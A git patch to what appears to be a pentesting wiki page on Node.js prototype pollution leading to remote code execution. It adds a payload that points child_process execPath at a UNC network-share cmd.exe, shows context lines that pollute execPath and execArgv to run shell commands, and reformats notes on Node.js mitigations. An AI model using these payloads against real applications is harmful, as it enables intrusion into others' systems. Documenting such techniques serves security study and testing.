From a69eb0b9c055225e1569b1bba223f22a25b9685e Mon Sep 17 00:00:00 2001
From: CPol
Date: Wed, 2 Nov 2022 23:04:12 +0000
Subject: [PATCH] GitBook: [#3639] No subject

---
 .../prototype-pollution-to-rce.md | 10 ++++++++--
 1 file changed, 8 insertions(+), 2 deletions(-)

diff --git a/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md b/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md
index c992684d2..68dc80996 100644
--- a/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md
+++ b/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md
@@ -256,6 +256,12 @@ b.__proto__.execPath = "/bin/sh"
 b.__proto__.argv0 = "/bin/sh"
 b.__proto__.execArgv = ["-c", "touch /tmp/fork-execArgv"]
 var proc = fork('./a_file.js');
+
+//With a Windows Remote payloadPayload
+const { fork } = require('child_process');
+b = {}
+b.__proto__.execPath = "\\\\127.0.0.1\\C$\\Windows\\System32\\cmd.exe"
+var proc = fork('./a_file.js');
 ```
 {% endcode %}
 
@@ -612,10 +618,10 @@ However, as the previous **`child_process`** methods, it has been **fixed** in t
 Please, note that prototype pollution works if the **attribute** of an object that is being accessed is **undefined**. If in the **code** that **attribute** is **set** a **value** you **won't be able to overwrite it**.
-In Jun 2022 from [**this commit**](https://github.com/nodejs/node/commit/20b0df1d1eba957ea30ba618528debbe02a97c6a) the var `options` instead of a `{}` is a **`kEmptyObject`**. Which **prevents a prototype pollution** from affecting the **attributes** of **`options`** to obtain RCE.\
+In Jun 2022 from [**this commit**](https://github.com/nodejs/node/commit/20b0df1d1eba957ea30ba618528debbe02a97c6a) the var `options` instead of a `{}` is a **`kEmptyObject`**. Which **prevents a prototype pollution** from affecting the **attributes** of **`options`** to obtain RCE.\
 At least from v18.4.0 this protection has been **implemented,** and therefore the `spawn` and `spawnSync` **exploits** affecting the methods **no longer work** (if no `options` are used!).
-In [**this commit**](https://github.com/nodejs/node/commit/0313102aaabb49f78156cadc1b3492eac3941dd9) the **prototype pollution** of **`contextExtensions`** from the vm library was **also kind of fixed** setting options to **`kEmptyObject` ** instead of **`{}`.**
+In [**this commit**](https://github.com/nodejs/node/commit/0313102aaabb49f78156cadc1b3492eac3941dd9) the **prototype pollution** of **`contextExtensions`** from the vm library was **also kind of fixed** setting options to \*\*`kEmptyObject` \*\* instead of **`{}`.**
 ## References